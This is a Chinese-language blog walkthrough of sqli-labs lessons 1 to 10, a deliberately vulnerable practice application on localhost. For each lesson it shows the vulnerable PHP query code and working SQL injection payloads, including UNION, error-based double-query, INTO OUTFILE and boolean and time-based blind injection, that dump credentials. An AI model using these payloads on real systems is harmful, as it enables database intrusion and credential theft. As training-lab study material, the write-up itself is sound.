SQLI-LAB 的實戰記錄(Less 1 - Less 10)

戰狼767發表於2016-07-15

以下內容只是本人在做 sqli-lab 練習時寫下的記錄，僅供參考。
因為本人學過一些sql注入的內容，所以大部分內容是沒有講解的，如有不清楚的地方，請自行使用搜尋引擎查詢，相信會得到所需的內容。

Less - 1 Error Based- String

（第1節：基於錯誤 – 字串）

字元型注入，也即是通過Get或者Post方式傳進去的資料被單引號或者雙引號包裹住

Test:

    http://localhost/sqli-lab/Less-1/index.php?id=2'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”2” LIMIT 0,1’ at line 1
注：報錯中limit前面的是 ‘2” 對比URL上的 2’，可推斷，php的sql語句中 $id 可能被單引號包裹

Sourse Code：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
 } else {
    print_r(mysql_error());
}

注：id被單引號包裹；不報錯的時候，會顯示username和password這兩個位置的內容

Solution：

' or '1'='1
    http://localhost/sqli-lab/Less-1/index.php?id=1' or '1'='1

'  --+
    http://localhost/sqli-lab/Less-1/index.php?id= 1'  --+

     其它：

    http://localhost/sqli-lab/Less-1/index.php?id=0' union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-1/index.php?id= ' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' or '1

    http://localhost/sqli-lab/Less-1/index.php?id=0 ' union select 1,group_concat(username),group_concat(password) from security.users --+

Less - 2 Error Based- Intiger

（第2課：基於錯誤 – 數字型）

Test:

    http://localhost/sqli-lab/Less-2/index.php?id=2"/

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”/ LIMIT 0,1’ at line 1
注：報錯中limit前面的是 “/ 和URL上的一樣，可推斷，php的sql語句中 $id 可能沒有被其它符號包裹

Sourse Code：

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

注：id被雙引號包裹；不報錯的時候，會顯示username和password這兩個位置的內容

Solution：

or 1=1
     http://localhost/sqli-lab/Less-2/index.php?id= 1 or 1=1

or 1=1 --
    http://localhost/sqli-lab/Less-2/index.php?id= 1 or 1=1 --

--+
    http://localhost/sqli-lab/Less-2/index.php?id= 1 --+

     其它：

    http://localhost/sqli-lab/Less-2/index.php?id= 0 union select 1,version(),database()

    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users

    補充：

暴使用者名稱、版本號、庫名和路徑
    http://localhost/sqli-lab/Less-2/index.php?id=0  union select 1,2,group_concat(user(),0x5e5e,version(),0x5e5e,database(),0x5e5e,@@basedir) --+

暴所在庫的所有表名
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

暴列名
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

暴username和password的內容
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(username,0x5e,password),3 from users --

Less - 3 Error Based- String (with Twist)

（第3課：基於錯誤- 字串（變形））

Test:

http://localhost/sqli-lab/Less-3/index.php?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”) LIMIT 0,1’ at line 1

http://localhost/sqli-lab/Less-3/index.php?id=1' or 1=1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”) LIMIT 0,1’ at line 1
注：報錯中出現 ‘) 推斷SQL語句中應有 (‘$id’)存在

Sourse Code：

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

注：被(”) 包裹

Solution：

') or '1'=('1
     http://localhost/sqli-lab/Less-3/index.php?id=1 ') or '1'=('1

) or 1=1 --+
     http://localhost/sqli-lab/Less-3/index.php?id=1) or 1=1 --+

     其它：

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,group_concat(username),group_concat(password) from security.users --+

Less - 4 Error Based- DoubleQuotes String

（第4課：基於錯誤 - 雙引號字串）

Test:

    http://localhost/sqli-lab/Less-4/index.php?id=2"/

 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '") LIMIT 0,1' at line 1
 注： 報錯中limit前面的是 ") 對比URL上的 2"/，可推斷，php的sql語句中 $id 是被 雙引號和一層括號 包裹

Sourse Code：

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo "<font size='5' color= '#99FF00'>";
      echo 'Your Login name:'. $row['username'];
      echo "<br>";
      echo 'Your Password:' .$row['password'];
      echo "</font>";
}else{
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>"; 
}

注：加了一層雙引號和括號

Solution：

")or ("1")=("1
    http://localhost/sqli-lab/Less-4/index.php?id=1")or ("1")=("1

")or 1=1 --+
    http://localhost/sqli-lab/Less-4/index.php?id=1")or 1=1 --+

     其它：

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,group_concat(username),group_concat(password) from security.users --+

Less - 5 Double Query- Single Quotes- String

（第5課：雙注入 - 單引號 - 字串）

Test:

    http://localhost/sqli-lab/Less-5/index.php?id=2"/

注：未報錯，只顯示 You are in………..

    http://localhost/sqli-lab/Less-5/index.php?id=2'"' --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”’ – ’ LIMIT 0,1’ at line 1
注：能正常報錯，考慮使用報錯來獲取資訊，同時 limit前為 “’–’ 可以推斷 $id是用單引號包裹的

雙注入查詢需要四個函式/語句
1. Rand() //隨機函式
2. Floor() //取整函式
3. Count() //彙總函式
4. Group by clause //分組語句
雙注入的原理，簡單一句話原理就是有研究人員發現，當在一個聚合函式，比如count函式後面如果使用分組語句（group by）就會把查詢的一部分以錯誤的形式顯示出來“通過floor報錯的方法來爆資料的本質是group by語句的報錯。group by語句報錯的原因是floor(random(0)*2)的不確定性，即可能為0也可能為1（group by key的原理是迴圈讀取資料的每一行，將結果儲存於臨時表中。讀取每一行的key時，如果key存在於臨時表中，則不在臨時表中則更新臨時表中的資料；如果該key不存在於臨時表中，則在臨時表中插入key所在行的資料。group by floor(random(0)*2)出錯的原因是key是個隨機數，檢測臨時表中key是否存在時計算了一下floor(random(0)*2)可能為0，如果此時臨時表只有key為1的行不存在key為0的行，那麼資料庫要將該條記錄插入臨時表，由於是隨機數，插時又要計算一下隨機值，此時floor(random(0)*2)結果可能為1，就會導致插入時衝突而報錯。即檢測時和插入時兩次計算了隨機數的值。具體原理參考：http://www.mysqlops.com/2012/05/15/mysql-sql-analyze.html）。”

Sourse Code：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in...........';
}else{
    print_r(mysql_error());
}

注：$id被單引號包圍，URL正確時除可能知道格式外，無法獲取其它資訊；錯誤時有正常報錯，可以考慮從報錯入手

Solution：

' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    其它：

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    版本號：：資料庫名：：使用者名稱
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    表名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    列名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    行數
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第一行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第二行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第三行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第四行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第五行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 4,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第六行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 5,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第七行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 6,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第八行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 7,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

注：如果沒有現成的注入語句，建議使用mysql逐步測試出可用的語句

Less - 6 Double Query- Double Quotes- String

（第6課：雙注入 - 雙引號 - 字串）

Test:

    http://localhost/sqli-lab/Less-6/index.php?id=2'"' --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” – ” LIMIT 0,1’ at line 1
注：能正常報錯， limit前是 ’ – ” ，推斷 $id 是被雙引號包裹

Sourse Code：

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){   
    echo 'You are in...........';
}else{
    print_r(mysql_error());
}

注：$id被雙引號包圍，URL正確時除可能知道格式外，無法獲取其它資訊；錯誤時有正常報錯，可以考慮從報錯入手

Solution：

" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

     其它：

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+


    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns wheretable_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

Less - 7 Dump into Outfile

（第7課：轉儲檔案）

Test:

    http://localhost/sqli-lab/Less-7/index.php?id=2

You are in…. Use outfile……
注：和之前一樣正常時除可能的格式和提示的使用 outfile以外，無其它有效資訊

    http://localhost/sqli-lab/Less-7/index.php?id=2' --+

You have an error in your SQL syntax
注：得不到詳細的報錯

    http://localhost/sqli-lab/Less-7/index.php?id=2')) --+

注：正常，$id周圍應是單引號和雙層括號

Sourse Code：

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in.... Use outfile......';
}else{
    echo 'You have an error in your SQL syntax'; 
}

注：$id被雙層括號和單引號包圍，URL正確時有提示用outfile，錯誤時只知有錯誤

Solution：

2')) union select 1,2,3 into outfile  "F:\\666.txt" --+

     http://localhost/sqli-lab/Less-7/index.php?id=2')) union select 1,2,3 into outfile  "F:\\666.txt" --+

     其它：

    http://localhost/sqli-lab/Less-7/index.php?id=2')) union select username,'~~',password from users into outfile  "F:\\666.txt" --+

（第8課：盲注 - 基於布林值 - 單引號 - 字串）

Test:

    http://localhost/sqli-lab/Less-8/index.php?id=2'

注：什麼都沒有顯示，加上括號也不行

    http://localhost/sqli-lab/Less-8/index.php?id=2' --+

You are in………..
注：根據前幾次的經驗，這句話說明能查出，沒有報錯，那麼之前那個估計是錯了

    http://localhost/sqli-lab/Less-8/index.php?id=2"

You are in………..
注：沒報錯，雙引號加上或改成括號也都沒錯，看來$id是被單引號圈著了
因為除了對錯什麼都判斷不出來，所以考慮構造只需判斷對錯的語句，盲注

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) < 116 --+

注：正確。substr(待截斷的字串，開始位置，截斷長度)

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) < 115 --+

注：沒顯示，則這是錯的，對照ascii，也說明資料庫第一個字元是小寫的s

Sourse Code：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'You are in...........';
}else{
}

Solution：

2' and (ascii(substr((select database()) ,1,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 --+

     其它：

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length(database())) = 8 --+

注：數庫名長度=8

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,2,1))) = 101 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,3,1))) = 99 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,4,1))) = 117 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,5,1))) = 114 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,6,1))) = 105 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,7,1))) = 116 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,8,1))) = 121 --+  

注：資料庫名 security

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 101 --+

注：第一張表 表名長度=6，第一個字元是 e

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,3,1))) = 101 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,4,1))) = 114 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,5,1))) = 115 --+

注：第四張表是users

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select username from users limit 0,1) ,1,1))) = 68 --+

注：users表第一行 的username 第一個字母 D

（第9課：盲注 - 基於時間 - 單引號 - 字串）

Test:

    http://localhost/sqli-lab/Less-9/index.php?id=2
    http://localhost/sqli-lab/Less-9/index.php?id=2'
    http://localhost/sqli-lab/Less-9/index.php?id=2"
    http://localhost/sqli-lab/Less-9/index.php?id=2')

都只顯示 You are in………..這情況八成是要盲注，僅單純的布林值是不行了
（感謝這道題在提示是基於時間的。。。）

Sourse Code：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'You are in...........';
}else{
    echo 'You are in...........';
}

Solution：

    http://localhost/sqli-lab/Less-9/index.php?id=1'+and+if(1=1, sleep(1), null)+ --+

注：說明 and 前面是對的，會停1秒   

     其它：

    http://localhost/sqli-lab/Less-9/index.php?id=2' and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

    http://localhost/sqli-lab/Less-9/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 +and+if(1=1, sleep(1), null)+ --+

（第10課：盲注 - 基於時間 - 雙引號 - 字串）

Test:

    http://localhost/sqli-lab/Less-10/index.php?id=2' and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

注：這個跳得挺快的，and前面是寫錯了

     http://localhost/sqli-lab/Less-10/index.php?id=2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

注：這個對了

Sourse Code：

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in...........';
}else{
    echo 'You are in...........';
}

Solution：

2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+ 

     其它：

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 +and+if(1=1, sleep(1), null)+ --+

Sqli-labs之Less1-10
2017-04-14
SQL
【Less】Less基本用法總結
2020-12-30
less引用其他less檔案
2017-11-12
規模化敏捷LeSS（二）：LeSS*隊實踐指南
2021-07-29
敏捷
sqli-less 筆記
2018-08-03
SQL筆記
規模化敏捷LeSS（二）：LeSS團隊實踐指南
2021-07-29
敏捷
命令：less
2018-12-04
Sqli-Labs：Less2-Less4
2018-07-24
SQL
less語法實用手冊
2017-11-23
1.Less學習筆記第一篇
2016-02-26
筆記
Less 入門
2018-01-30
less巢狀
2017-11-12
巢狀
Less 簡介
2013-12-26
LESS簡介
2016-05-10
vite中配置less，vue3中配置less
2024-03-15
ViteVue
規模化敏捷 LeSS（三）：LeSS Huge 是怎樣煉成的？
2021-08-05
敏捷
最全的less筆記，半小時學會！
2019-04-30
筆記
值得參考的10個LESS CSS例項
2013-02-22
CSS
less用法總結
2019-11-22
Linux Less 命令
2019-04-10
Linux
less學習一
2018-08-21
JAVASCRIPT. BUT LESS IFFY
2018-11-15
JavaScript
less 語法教程
2018-03-06
vscode的gulp-less自動把less編譯成css
2018-07-12
VSCode編譯CSS
linux less的學習
2019-02-26
Linux
LESS與SASS的區別
2021-09-09
sass和less的區別
2018-08-10
前端必備-less 的使用
2020-12-08
前端
css進階less的使用
2018-04-27
CSS
我的LESS編譯方案
2013-08-07
編譯
在webstorm中配置less
2020-11-30
WebORM
VUE學習之less
2020-09-29
Vue
webstrom配置sass與less
2016-11-16
Web
Less程式碼規範
2018-07-10
Less函式說明
2013-12-26
函式
瀏覽器端Less
2014-12-01
瀏覽器
CSS/LESS tips and snippets
2015-11-07
CSS
less的介紹和應用
2018-01-10

SQLI-LAB 的 實戰記錄(Less 1 - Less 10)

Less - 1 Error Based- String

Test:

Sourse Code：

Solution：

Less - 2 Error Based- Intiger

Test:

Sourse Code：

Solution：

Less - 3 Error Based- String (with Twist)

Test:

Sourse Code：

Solution：

Less - 4 Error Based- DoubleQuotes String

Test:

Sourse Code：

Solution：

Less - 5 Double Query- Single Quotes- String

Test:

Sourse Code：

Solution：

Less - 6 Double Query- Double Quotes- String

Test:

Sourse Code：

Solution：

Less - 7 Dump into Outfile

Test:

Sourse Code：

Solution：

Less - 8 Blind- Boolian- Single Quotes- String

Test:

Sourse Code：

Solution：

Less - 9 Blind- Time based- Single Quotes- String

Test:

Sourse Code：

Solution：

Less - 10 Blind- Time based- Double Quotes- String

Test:

Sourse Code：

Solution：

相關文章

SQLI-LAB 的實戰記錄(Less 1 - Less 10)